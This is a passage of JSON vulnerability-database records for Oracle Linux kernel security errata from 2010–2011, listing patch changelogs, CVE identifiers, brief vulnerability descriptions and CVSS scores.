7607479]\n- [nfs] convert ENETUNREACH to ENOTCONN [orabug 7689332]\n- [NET] Add xen pv/bonding netconsole support (Tina Yang) [orabug 6993043]\n [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [nfsd] fix failure of file creation from hpux client (Wen gang Wang)\n [orabug 7579314]\n- [qla] fix qla not to query hccr (Guru Anbalagane) [Orabug 8746702]\n- [net] bonding: fix xen+bonding+netconsole panic issue (Joe Jin) \n [orabug 9504524]\n- [rds] Patch rds to 1.4.2-14 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki, Chris Mason, Herbert van den Bergh)\n [orabug 9245919]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-194.17.4.el5]\n- [net] rds: fix local privilege escalation (Eugene Teo) [642897 642898] {CVE-2010-3904}", "cvss3": {}, "published": "2010-10-27T00:00:00", "type": "oraclelinux", "title": "kernel security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-27T00:00:00", "id": "ELSA-2010-0792", "href": "http://linux.oracle.com/errata/ELSA-2010-0792.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:19", "description": "Following security bugs are fixed in this errata\nCVE-2010-3904\nWhen copying data to userspace, the RDS protocol failed to verify that the user-provided address was a valid\nuserspace address. A local unprivileged user could issue specially crafted socket calls to write arbitrary\nvalues into kernel memory and potentially escalate privileges to root.\nCVE-2010-3067\nInteger overflow in the do_io_submit function in fs/aio.c in the Linux kernel before 2.6.36-rc4-next-20100915 allows\nlocal users to cause a denial of service or possibly have unspecified other impact via crafted use of the io_submit\nsystem call.\nCVE-2010-3477\nThe tcf_act_police_dump function in net/sched/act_police.c in the actions implementation in the network queueing\nfunctionality in the Linux kernel before 2.6.36-rc4 does not properly initialize certain structure members, which\nallows local users to obtain potentially sensitive information from kernel memory via vectors involving a dump\noperation. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-2942.\nkernel:\n[2.6.32-100.21.1.el5]\n- [rds] fix access issue with rds (Chris Mason) {CVE-2010-3904}\n- [fuse] linux-2.6.32-fuse-return-EGAIN-if-not-connected-bug-10154489.patch\n- [net] linux-2.6.32-net-sched-fix-kernel-leak-in-act_police.patch\n- [aio] linux-2.6.32-aio-check-for-multiplication-overflow-in-do_io_subm.patch\nofa:\n[1.5.1-4.0.23]\n- Fix rds permissions checks during copies\n[1.5.1-4.0.21]\n- Update to BXOFED 1.5.1-1.3.6-5 ", "cvss3": {}, "published": "2010-10-22T00:00:00", "type": "oraclelinux", "title": "Oracle Linux 5 Unbreakable Enterprise kernel security fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3477", "CVE-2010-3067"], "modified": "2010-10-22T00:00:00", "id": "ELSA-2010-2009", "href": "http://linux.oracle.com/errata/ELSA-2010-2009.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:02", "description": "[2.6.18-194.26.1.0.1.el5]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- Add entropy support to igb (John Sobecki) [orabug 7607479]\n- [nfs] convert ENETUNREACH to ENOTCONN [orabug 7689332]\n- [NET] Add xen pv/bonding netconsole support (Tina Yang) [orabug 6993043]\n [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [nfsd] fix failure of file creation from hpux client (Wen gang Wang)\n [orabug 7579314]\n- [qla] fix qla not to query hccr (Guru Anbalagane) [Orabug 8746702]\n- [net] bonding: fix xen+bonding+netconsole panic issue (Joe Jin) \n [orabug 9504524]\n- [rds] Patch rds to 1.4.2-14 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki, Chris Mason, Herbert van den Bergh)\n [orabug 9245919]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-194.26.1.el5]\n- [net] mlx4: bump max log_mtts_per_seg memory reservation (Jay Fenlason) [643806 636198]\n[2.6.18-194.25.1.el5]\n- [fs] nfs: fix regression in NFS Direct I/O path (Steve Dickson) [647601 647297]\n[2.6.18-194.24.1.el5]\n- Changelog fix\n[2.6.18-194.23.1.el5]\n- [net] bonding: correctly process non-linear skbs (Andy Gospodarek) [644822 619070]\n- Syncing following patch from branched build:\n- [net] rds: fix local privilege escalation (Eugene Teo) [642897 642898] {CVE-2010-3904}\n[2.6.18-194.22.1.el5]\n- [fs] xfs: fix speculative allocation beyond eof (Dave Chinner) [643571 638753]\n[2.6.18-194.21.1.el5]\n- [scsi] qla2xxx: Correct use-after-free issue in terminate_rport_io callback \n (Chad Dupuis) [643135 567428]\n- [misc] futex: replace LOCK_PREFIX in futex.h (Peter Zijlstra) [633175 633176]\n {CVE-2010-3086}\n- [v4l] remove compat code for VIDIOCSMICROCODE (Mauro Carvalho Chehab) [642470\n 642471] {CVE-2010-2963}\n- [xen] hvm: correct accuracy of pmtimer (Andrew Jones) [641915 633028]\n- [net] bonding: fix IGMP report on slave during failover (Flavio Leitner) [640973 \n 637764]\n- [fs] nfsv4: fix bug when server returns NFS4ERR_RESOURCE (Steve Dickson) [628889 \n 620502]\n- [fs] nfsv4: ensure lockowners are labelled correctly (Steve Dickson) [628889 \n 620502]\n- [fs] nfsv4: add support for RELEASE_LOCKOWNER operation (Steve Dickson) [628889 \n 620502]\n- [fs] nfsv4: clean up for lockowner XDR encoding (Steve Dickson) [628889 620502]\n- [fs] nfsv4: ensure we track lock state in r/w requests (Steve Dickson) [628889\n 620502]\n- [time] implement fine grained accounting for PM timer (Ulrich Obergfell) \n [637069 586285]\n- [time] initialize tick_nsec based on kernel parameters (Ulrich Obergfell) \n [637069 586285]\n- [time] introduce 'pmtimer_fine_grained' kernel parameter (Ulrich Obergfell) \n [637069 586285]\n- [fs] nfs: wait for close before silly-renaming (Jeff Layton) [642628 565974]\n[2.6.18-194.20.1.el5]\n- [scsi] megaraid_sas: fix physical disk handling (Tomas Henzl) [619365 564249]\n- [scsi] lpfc: fix ioctl crash in lpfc_nlp_put (Rob Evers) [637727 625841]\n- [net] sched: fix info leak in traffic policing (Neil Horman) [636391 636392] \n {CVE-2010-3477}\n- [md] dm: fix deadlock with fsync vs. resize in lvm (Mikulas Patocka) [632255 \n 624068]\n- [misc] fix race in pid generation causing immediate reuse (Dave Anderson) \n [638866 634850]\n- [scsi] fix disk spinup for shorter path restore times (Rob Evers) [634977 \n 608109]\n- [fs] aio: check for multiplication overflow in io_submit (Jeff Moyer) [629448 \n 629449] {CVE-2010-3067}\n- [fs] xfs: prevent reading uninitialized stack memory (Dave Chinner) [630806 \n 630807] {CVE-2010-3078}\n- [fs] aio: fix cleanup in io_submit_one (Jeff Moyer) [631720 631721] \n {CVE-2010-3066}\n- [net] ipv4: fix buffer overflow in icmpmsg_put (Frantisek Hrbata) [634976 \n 601391]\n- [xen] hvm: fix UP suspend/resume/migration w/PV drivers (Miroslav Rezanina) \n [630989 629773]\n- [fs] dlm: fix try 1cb failure, part 2 (Abhijith Das) [639073 504188]\n- [fs] dlm: no node callback when try 1cb lock req fails (David Teigland) \n [639073 504188]\n[2.6.18-194.19.1.el5]\n- [virt] xen: fix xennet driver to not corrupt data (Neil Horman) [637220 630129]\n- [pnp] ignore both UNSET and DISABLED ioresources (Prarit Bhargava) [629861 \n 560540]\n- [pnp] reserve system board iomem and ioport resources (Prarit Bhargava) \n [629861 560540]\n- [net] bonding: fix ALB mode to balance traffic on VLANs (Andy Gospodarek) \n [630540 578531]\n- [net] qla3xxx: fix oops on too-long netdev priv structure (Neil Horman) [637206 \n 620508]\n- [acpi] thinkpad-acpi: lock down video output state access (Don Howard) [629241\n 607037]\n[2.6.18-194.18.1.el5]\n- [s390] dasd: fix race between tasklet and dasd_sleep_on (Hendrik Brueckner) \n[638579 593756] ", "cvss3": {}, "published": "2010-11-09T00:00:00", "type": "oraclelinux", "title": "kernel security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-3078", "CVE-2010-3477", "CVE-2010-3086", "CVE-2010-2963", "CVE-2010-3066", "CVE-2010-3067", "CVE-2010-3448"], "modified": "2010-11-09T00:00:00", "id": "ELSA-2010-0839", "href": "http://linux.oracle.com/errata/ELSA-2010-0839.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:33", "description": "[2.6.32-71.14.1.0.1.el6]\n- replace Red Hat with Oracle in files genkey and kernel.spec\n[2.6.32-71.14.1.el6]\n- [kvm] x86: zero kvm_vcpu_events->interrupt.pad (Marcelo Tosatti) [665471 665409] {CVE-2010-4525}\n[2.6.32-71.13.1.el6]\nemail_6.RHSA-2011-0007 178L, 11970C written\n- [scsi] lpfc: Fixed crashes for NULL pnode dereference (Rob Evers) [660589 635733]\n[2.6.32-71.12.1.el6]\n- [netdrv] igb: only use vlan_gro_receive if vlans are registered (Stefan Assmann) [652804 660192] {CVE-2010-4263}\n- [net] core: neighbour update Oops (Jiri Pirko) [660591 658518]\n- [scsi] lpfc: Set heartbeat timer off by default (Rob Evers) [660244 655935]\n- [scsi] lpfc: Fixed crashes for BUG_ONs hit in the lpfc_abort_handler (Rob Evers) [659611 645882]\n[2.6.32-71.11.1.el6]\n- [kernel] posix-cpu-timers: workaround to suppress the problems with mt exec (Oleg Nesterov) [656267 656268] {CVE-2010-4248}\n- [fs] bio: take care not overflow page count when mapping/copying user data (Danny Feng) [652530 652531] {CVE-2010-4162}\n- [net] can-bcm: fix minor heap overflow (Danny Feng) [651846 651847] {CVE-2010-3874}\n- [net] filter: make sure filters dont read uninitialized memory (Jiri Pirko) [651704 651705] {CVE-2010-4158}\n- [net] inet_diag: Make sure we actually run the same bytecode we audited (Jiri Pirko) [651268 651269] {CVE-2010-3880}\n- [v4l] ivtvfb: prevent reading uninitialized stack memory (Mauro Carvalho Chehab) [648832 648833] {CVE-2010-4079}\n- [drm] via/ioctl.c: prevent reading uninitialized stack memory (Dave Airlie) [648718 648719] {CVE-2010-4082}\n- [char] nozomi: clear data before returning to userspace on TIOCGICOUNT (Mauro Carvalho Chehab) [648705 648706] {CVE-2010-4077}\n- [serial] clean data before filling it on TIOCGICOUNT (Mauro Carvalho Chehab) [648702 648703] {CVE-2010-4075}\n- [net] af_unix: limit unix_tot_inflight (Neil Horman) [656761 656762] {CVE-2010-4249}\n- [block] check for proper length of iov entries in blk_rq_map_user_iov() (Danny Feng) [652958 652959] {CVE-2010-4163}\n- [net] Limit sendto()/recvfrom()/iovec total length to INT_MAX (Jiri Pirko) [651894 651895] {CVE-2010-4160}\n- [netdrv] mlx4: Add OFED-1.5.2 patch to increase log_mtts_per_seg (Jay Fenlason) [643815 637284]\n- [kernel] kbuild: fix external module compiling (Aristeu Rozanski) [658879 655231]\n- [net] bluetooth: Fix missing NULL check (Jarod Wilson) [655667 655668] {CVE-2010-4242}\n- [kernel] ipc: initialize structure memory to zero for compat functions (Danny Feng) [648694 648695] {CVE-2010-4073}\n- [kernel] shm: fix information leak to userland (Danny Feng) [648688 648689] {CVE-2010-4072}\n- [md] dm: remove extra locking when changing device size (Mike Snitzer) [653900 644380]\n- [block] read i_size with i_size_read() (Mike Snitzer) [653900 644380]\n- [kbuild] don't sign out-of-tree modules (Aristeu Rozanski) [655122 653507]\n[2.6.32-71.10.1.el6]\n- [fs] xfs: prevent reading uninitialized stack memory (Dave Chinner) [630808 630809] {CVE-2010-3078}\n- [net] fix rds_iovec page count overflow (Jiri Pirko) [647423 647424] {CVE-2010-3865}\n- [scsi] Fix megaraid_sas driver SLAB memory leak detected with CONFIG_DEBUG_SLAB (Shyam Iyer) [649436 633836]\n- [usb] serial/mos*: prevent reading uninitialized stack memory (Don Zickus) [648697 648698] {CVE-2010-4074}\n- [kernel] ecryptfs_uid_hash() buffer overflow (Jerome Marchand) [626320 611388] {CVE-2010-2492}\n- [sound] seq/oss - Fix double-free at error path of snd_seq_oss_open() (Jaroslav Kysela) [630554 630555] {CVE-2010-3080}\n- [virt] virtio-net: init link state correctly (Jason Wang) [653340 646369]\n- [netdrv] prevent reading uninitialized memory in hso driver (Thomas Graf) [633143 633144] {CVE-2010-3298}\n[2.6.32-71.9.1.el6]\n- [fs] Do not mix FMODE_ and O_ flags with break_lease() and may_open() (Harshula Jayasuriya) [648408 642677]\n- [fs] aio: check for multiplication overflow in do_io_submit (Jeff Moyer) [629450 629451] {CVE-2010-3067}\n- [net] fix info leak from kernel in ethtool operation (Neil Horman) [646727 646728] {CVE-2010-3861}\n- [net] packet: fix information leak to userland (Jiri Pirko) [649899 649900] {CVE-2010-3876}\n- [net] clean up info leak in act_police (Neil Horman) [636393 636394] {CVE-2010-3477}\n- [mm] Prevent Out Of Memory when changing cpuset's mems on NUMA (Larry Woodman) [651996 597127]\n[2.6.32-71.8.1.el6]\n- [mm] remove false positive THP pmd_present BUG_ON (Andrea Arcangeli) [647391 646384]\n[2.6.32-71.7.1.el6]\n- [drm] ttm: fix regression introduced in dfb4a4250168008c5ac61e90ab2b86f074a83a6c (Dave Airlie) [646994 644896]\n[2.6.32-71.6.1.el6]\n- [block] fix a potential oops for callers of elevator_change (Jeff Moyer) [644926 641408]\n[2.6.32-71.5.1.el6]\n- [security] IMA: require command line option to enabled (Eric Paris) [644636 643667]\n- [net] Fix priv escalation in rds protocol (Neil Horman) [642899 642900] {CVE-2010-3904}\n- [v4l] Remove compat code for VIDIOCSMICROCODE (Mauro Carvalho Chehab) [642472 642473] {CVE-2010-2963}\n- [kernel] tracing: do not allow llseek to set_ftrace_filter (Jiri Olsa) [631625 631626] {CVE-2010-3079}\n- [virt] xen: hold mm->page_table_lock in vmalloc_sync (Andrew Jones) [644038 643371]\n- [fs] xfs: properly account for reclaimed inodes (Dave Chinner) [642680 641764]\n- [drm] fix ioctls infoleak (Danny Feng) [626319 621437] {CVE-2010-2803}\n- [netdrv] wireless extensions: fix kernel heap content leak (John Linville) [628437 628438] {CVE-2010-2955}\n- [netdrv] niu: buffer overflow for ETHTOOL_GRXCLSRLALL (Danny Feng) [632071 632072] {CVE-2010-3084}\n- [mm] add debug checks for mapcount related invariants (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] move VM_BUG_ON inside the page_table_lock of zap_huge_pmd (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] compaction: handle active and inactive fairly in too_many_isolated (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] start_khugepaged after setting transparent_hugepage_flags (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] fix hibernate memory corruption (Andrea Arcangeli) [644037 642570]\n- [mm] ksmd wait_event_freezable (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] khugepaged wait_event_freezable (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] unlink_anon_vmas in __split_vma in case of error (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] fix memleak in copy_huge_pmd (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] fix hang on anon_vma->root->lock (Andrea Arcangeli) [642679 622327 644037 642570]\n- [mm] avoid breaking huge pmd invariants in case of vma_adjust failures (Andrea Arcangeli) [642679 622327 644037 642570]\n[2.6.32-71.4.1.el6]\n- [scsi] fcoe: set default FIP mode as FIP_MODE_FABRIC (Mike Christie) [641457 636233]\n- [virt] KVM: Fix fs/gs reload oops with invalid ldt (Avi Kivity) [639884 639885] {CVE-2010-3698}\n- [drm] i915: prevent arbitrary kernel memory write (Jerome Marchand) [637690 637691] {CVE-2010-2962}\n- [scsi] libfc: adds flogi retry in case DID is zero in RJT (Mike Christie) [641456 633907]\n- [kernel] prevent heap corruption in snd_ctl_new() (Jerome Marchand) [638485 638486] {CVE-2010-3442}\n- [scsi] lpfc: lpfc driver oops during rhel6 installation with snapshot 12/13 and emulex FC (Rob Evers) [641907 634703]\n- [fs] ext4: Always journal quota file modifications (Eric Sandeen) [641454 624909]\n- [mm] fix split_huge_page error like mapcount 3 page_mapcount 2 (Andrea Arcangeli) [641258 640611]\n- [block] Fix pktcdvd ioctl dev_minor range check (Jerome Marchand) [638088 638089] {CVE-2010-3437}\n- [drm] ttm: Fix two race conditions + fix busy codepaths (Dave Airlie) [642045 640871]\n- [drm] Prune GEM vma entries (Dave Airlie) [642043 640870]\n- [virt] ksm: fix bad user data when swapping (Andrea Arcangeli) [641459 640579]\n- [virt] ksm: fix page_address_in_vma anon_vma oops (Andrea Arcangeli) [641460 640576]\n- [net] sctp: Fix out-of-bounds reading in sctp_asoc_get_hmac() (Jiri Pirko) [640461 640462] {CVE-2010-3705}\n- [mm] Move vma_stack_continue into mm.h (Mike Snitzer) [641483 638525]\n- [net] sctp: Do not reset the packet during sctp_packet_config() (Jiri Pirko) [637681 637682] {CVE-2010-3432}\n- [mm] vmstat incorrectly reports disk IO as swap in (Steve Best) [641458 636978]\n- [scsi] fcoe: Fix NPIV (Neil Horman) [641455 631246]\n[2.6.32-71.3.1.el6]\n- [block] prevent merges of discard and write requests (Mike Snitzer) [639412 637805]\n- [drm] nouveau: correct INIT_DP_CONDITION subcondition 5 (Ben Skeggs) [638973 636678]\n- [drm] nouveau: enable enhanced framing only if DP display supports it (Ben Skeggs) [638973 636678]\n- [drm] nouveau: fix required mode bandwidth calculation for DP (Ben Skeggs) [638973 636678]\n- [drm] nouveau: disable hotplug detect around DP link training (Ben Skeggs) [638973 636678]\n- [drm] nouveau: set DP display power state during DPMS (Ben Skeggs) [638973 636678]\n- [mm] remove madvise from possible /sys/kernel/mm/redhat_transparent_hugepage/enabled options (Larry Woodman) [636116 634500]\n- [netdrv] cxgb3: don't flush the workqueue if we are called from the workqueue (Doug Ledford) [634973 631547]\n- [netdrv] cxgb3: deal with fatal parity error status in interrupt handler (Doug Ledford) [634973 631547]\n- [netdrv] cxgb3: now that we define fatal parity errors, make sure they are cleared (Doug Ledford) [634973 631547]\n- [netdrv] cxgb3: Add define for fatal parity error bit manipulation (Doug Ledford) [634973 631547]\n- [virt] Emulate MSR_EBC_FREQUENCY_ID (Jes Sorensen) [633966 629836]\n- [virt] Define MSR_EBC_FREQUENCY_ID (Jes Sorensen) [633966 629836]\n- [kernel] initramfs: Fix initramfs size calculation (Hendrik Brueckner) [637087 626956]\n- [kernel] initramfs: Generalize initramfs_data.xxx.S variants (Hendrik Brueckner) [637087 626956]\n- [drm] radeon/kms: fix sideport detection on newer rs880 boards (Dave Airlie) [634984 626454]\n- [block] switch s390 tape_block and mg_disk to elevator_change() (Mike Snitzer) [633864 632631]\n- [block] add function call to switch the IO scheduler from a driver (Mike Snitzer) [633864 632631]\n[2.6.32-71.2.1.el6]\n- [misc] make compat_alloc_user_space() incorporate the access_ok() (Xiaotian Feng) [634465 634466] {CVE-2010-3081}\n- [x86] kernel: fix IA32 System Call Entry Point Vulnerability (Xiaotian Feng) [634451 634452] {CVE-2010-3301}\n[2.6.32-71.1.1.el6]\n- [security] Make kernel panic in FIPS mode if modsign check fails (David Howells) [633865 625914]\n- [virt] Guests on AMD with CPU type 6 and model >= 8 trigger errata read of MSR_K7_CLK_CTL (Jes Sorensen) [632292 629066]\n- [x86] UV: use virtual efi on SGI systems (George Beshers) [633964 627653]", "cvss3": {}, "published": "2011-02-12T00:00:00", "type": "oraclelinux", "title": "kernel security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-4242", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4668", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-3437", "CVE-2010-2492", "CVE-2010-4074", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-3477", "CVE-2010-4080", "CVE-2010-4525", "CVE-2010-2963", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3698", "CVE-2010-4162", "CVE-2010-4263", "CVE-2010-3442", "CVE-2010-4248", "CVE-2010-3705", "CVE-2010-4079", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-4160", "CVE-2010-3067", "CVE-2010-2803", "CVE-2010-3084", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-3079", "CVE-2010-4077", "CVE-2010-3861", "CVE-2010-4075", "CVE-2010-3301"], "modified": "2011-02-12T00:00:00", "id": "ELSA-2011-0007", "href": "http://linux.oracle.com/errata/ELSA-2011-0007.html", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "[2.6.18-238.el5]\n- [net] bnx2: remove extra call to pci_map_page (John Feeney) [663509]\n- [fs] nfs: set lock_context field in nfs_readpage_sync (Jeff Layton) [663853]\n[2.6.18-237.el5]\n- [block] fully zeroize request struct in rq_init (Rob Evers) [662154]\n- [scsi] qla4xxx: update to 5.02.04.02.05.06-d0 (Chad Dupuis) [656999]\n- [scsi] qla4xxx: make get_sys_info function return void (Chad Dupuis) [656999]\n- [scsi] qla4xxx: dont default device to FAILED state (Chad Dupuis) [656999]\n- [scsi] qla4xxx: mask bits in F/W Options during init (Chad Dupuis) [656999]\n- [scsi] qla4xxx: update to 5.02.04.01.05.06-d0 (Chad Dupuis) [661768]\n- [scsi] qla4xxx: disable irq instead of req pci_slot_reset (Chad Dupuis) [661768]\n- [scsi] qla4xxx: no device add until scsi_add_host success (Chad Dupuis) [661768]\n- [fs] nfs: set lock_context field in nfs_writepage_sync (Jeff Layton) [660580]\n- [scsi] bfa: fix crash reading driver sysfs statistics (Rob Evers) [659880] {CVE-2010-4343}\n- [misc] cpufeature: avoid corrupting cpuid vendor id (Matthew Garrett) [568751]\n- [char] drm: dont set signal blocker on master process (Dave Airlie) [570604]\n- [fs] nfs: remove problematic calls to nfs_clear_request (Jeff Layton) [656492]\n- [fs] nfs: handle alloc failures in nfs_create_request (Jeff Layton) [656492]\n- [fs] nfs: clean up nfs_create_request (Jeff Layton) [656492]\n- [net] forcedeth: fix race condition in latest backport (Ivan Vecera) [658434]\n- [net] cxgb3: fix read of uninitialized stack memory (Jay Fenlason) [633155] {CVE-2010-3296}\n- [net] tg3: increase jumbo flag threshold (John Feeney) [660506]\n- [net] s2io: fix netdev initialization failure (Bob Picco) [654948]\n- [net] igb: only use vlan_gro_receive if vlans registered (Stefan Assmann) [660190] {CVE-2010-4263}\n- [net] ipv6: try all routers with unknown reachable state (Thomas Graf) [661393]\n- [misc] kernel: fix address limit override in OOPS path (Dave Anderson) [659571] {CVE-2010-4258}\n[2.6.18-236.el5]\n- [powerpc] support DLPAR remove operations (Steve Best) [655089]\n- [net] igb: fix tx packet count (Stefan Assmann) [658801]\n- [usb] serial: new driver MosChip MCS7840 (Stefan Assmann) [574507]\n- [fs] exec: copy fixes into compat_do_execve paths (Oleg Nesterov) [625694] {CVE-2010-4243}\n- [fs] exec: make argv/envp memory visible to oom-killer (Oleg Nesterov) [625694] {CVE-2010-4243}\n- [misc] binfmts: kill bprm->argv_len (Oleg Nesterov) [625694] {CVE-2010-4243}\n- [mm] backport upstream stack guard page /proc reporting (Larry Woodman) [643426]\n- [mm] add guard page for stacks that grow upwards (Johannes Weiner) [630563]\n- [net] tipc: fix information leak to userland (Jiri Pirko) [649892] {CVE-2010-3877}\n- [sound] ALSA: fix sysfs unload and OSS mixer mutex issues (Jaroslav Kysela) [652165]\n- [net] tg3: fix 5719 bugs (John Feeney) [657097]\n- [net] bnx2: update firmware to 6.0.x (John Feeney) [644438]\n- [redhat] configs: add CONFIG_SECURITY_DMESG_RESTRICT (Frantisek Hrbata) [653250]\n- [misc] kernel: restrict unprivileged access to dmesg (Frantisek Hrbata) [653250]\n- [virt] xen: dont allow blkback virtual CDROM device (Andrew Jones) [635638] {CVE-2010-4238}\n- Revert: [xen] cd-rom drive does not recognize new media (Andrew Jones) [635638] {CVE-2010-4238}\n- [net] qlge: fix deadlock when interface is going down (Chad Dupuis) [654420]\n- [net] qlge: reset chip before freeing buffers (Chad Dupuis) [654420]\n- [net] qlge: restore vlan setting during ql_adapter_up (Chad Dupuis) [654420]\n- [scsi] qla4xxx: Update version to V5.02.04.00.05.06-d0 (Chad Dupuis) [656999]\n- [scsi] qla4xxx: Document Driver Versioning Scheme (Chad Dupuis) [656999]\n- [scsi] qla4xxx: Updated the Copyright header to 2010 (Chad Dupuis) [656999]\n- [scsi] qla4xxx: dont process devices untill probe done (Chad Dupuis) [656999]\n- [scsi] qla4xxx: free DDB when application calls for it (Chad Dupuis) [656999]\n- [scsi] qla4xxx: memory wedge with peg_halt test in loop (Chad Dupuis) [656999]\n- [scsi] qla4xxx: clear AF_FW_RECOVERY flag after reset (Chad Dupuis) [656999]\n- [scsi] qla4xxx: fix new IP address caching (Chad Dupuis) [656999]\n- [scsi] qla4xxx: replace hard coded values with macros (Chad Dupuis) [656999]\n- [scsi] qla4xxx: mark dev FAILED on 82XX init failure (Chad Dupuis) [656999]\n- [scsi] qla4xxx: fail init if pci mem write fails (Chad Dupuis) [656999]\n- [scsi] qla4xxx: ensure proper qla4xxx_conn_start state (Chad Dupuis) [656999]\n- [scsi] qla4xxx: do not process interrupts unconditionally (Chad Dupuis) [656999]\n- [scsi] qla4xxx: fix add w/iscsi2_create_conn not done yet (Chad Dupuis) [656999]\n- [scsi] qla4xxx: no fw hung if reset retry is in progress (Chad Dupuis) [656999]\n- [scsi] qla4xxx: correct use of cmd->host_scribble (Chad Dupuis) [656999]\n- [scsi] qla4xxx: msi init request_irq parameter usage fix (Chad Dupuis) [656999]\n- [scsi] qla4xxx: cleanup qla4xxx_wait_for_hba_online (Chad Dupuis) [656999]\n- [scsi] qla4xxx: grab hardware_lock before accessing srb (Chad Dupuis) [656999]\n- [scsi] qla4xxx: remove unwanted check for bad spd (Chad Dupuis) [656999]\n- [scsi] qla4xxx: update AER support for ISP82XX (Chad Dupuis) [656999]\n- [scsi] qla4xxx: clear rom lock if firmware died holding (Chad Dupuis) [656999]\n- [scsi] qla4xxx: CRB Register for Request Queue in-pointer (Chad Dupuis) [656999]\n- [scsi] qla4xxx: dump mailbox registers on System Error (Chad Dupuis) [656999]\n- [scsi] qla4xxx: add support for 8130/8131 AENs (Chad Dupuis) [656999]\n- [scsi] qla4xxx: fix seconds_since_last_heartbeat reset (Chad Dupuis) [656999]\n- [scsi] qla4xxx: no wait for outstanding command complete (Chad Dupuis) [656999]\n- [scsi] qla4xxx: free_irqs on failed initialize_adapter (Chad Dupuis) [656999]\n- [virt] xen: fix netback hotplug regression in xenbus fix (Laszlo Ersek) [635999]\n- [xen] fix 64-bit PV guest user mode segv crashing host (Paolo Bonzini) [658354] {CVE-2010-4255}\n[2.6.18-235.el5]\n- [net] filter: fix backport error in prior filter fix (Jarod Wilson) [651703]\n[2.6.18-234.el5]\n- [s390] vmlogrdr: purge after recording is switched off (Hendrik Brueckner) [653479]\n- [wireless] ieee80211: fix deauthentication (Stanislaw Gruszka) [644367]\n- [wireless] zd1211rw: fix associate after disassociate (Stanislaw Gruszka) [644367]\n- [fs] proc: fix NULL ->i_fop oops (Steve Best) [655083]\n- [scsi] lpfc: Update version to 8.2.0.87.1p (Rob Evers) [655119]\n- [scsi] lpfc: set heartbeat timer off by default (Rob Evers) [655119]\n- [scsi] lpfc: fix NULL deref duing allocation failure (Rob Evers) [655119]\n- [scsi] lpfc: fix remote SLI4 firmware download data bug (Rob Evers) [655119]\n- [scsi] lpfc: fix FDMI_DID login failure after link bounce (Rob Evers) [655119]\n- [scsi] lpfc: handle CVL after nameserver PLOGI timeouts (Rob Evers) [655119]\n- [scsi] lpfc: cleanup mbox cmds in mboxq_cmpl if CVL rcvd (Rob Evers) [655119]\n- [misc] posix-cpu-timers: workaround for mt exec problems (Oleg Nesterov) [656266]\n- [fs] 